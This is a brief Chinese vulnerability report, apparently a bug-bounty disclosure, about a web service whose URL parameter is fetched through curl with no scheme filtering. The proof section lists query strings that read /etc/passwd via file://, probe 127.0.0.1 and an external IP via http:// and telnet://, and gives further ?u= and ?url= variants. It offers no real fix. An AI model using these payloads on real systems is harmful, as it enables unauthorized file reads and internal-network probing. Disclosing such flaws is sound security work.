多处任意文件读取漏洞。。。

详细说明:

程序应该是用了curl库吧,没有注意到file://协议,导致本地任意文件读取。。。

漏洞证明:

程序应该是用了curl库吧,没有注意到file://协议,导致本地任意文件读取。。。

?sid=2247&type=0&url=file:///etc/passwd&pos=1&from=0&gsid=3_5bc7d139d8527229d2df38b6765c6b91b8428eda66bd8c1e61b5df&vt=2

为什么这样说?可以做如下测试:

?sid=2247&type=0&url=http://127.0.0.1/&pos=1&from=0&gsid=3_5bc7d139d8527229d2df38b6765c6b91b8428eda66bd8c1e61b5df&vt=2

或者

?sid=2247&type=0&url=telnet://221.179.193.1&pos=1&from=0&gsid=3_5bc7d139d8527229d2df38b6765c6b91b8428eda66bd8c1e61b5df&vt=2

在或者干脆读代码

其他一些:

?u=file:///etc/passwd

?u=file:///etc/passwd

?url=file:///etc/passwd

修复方案:

这漏洞应该早就有人发现了吧。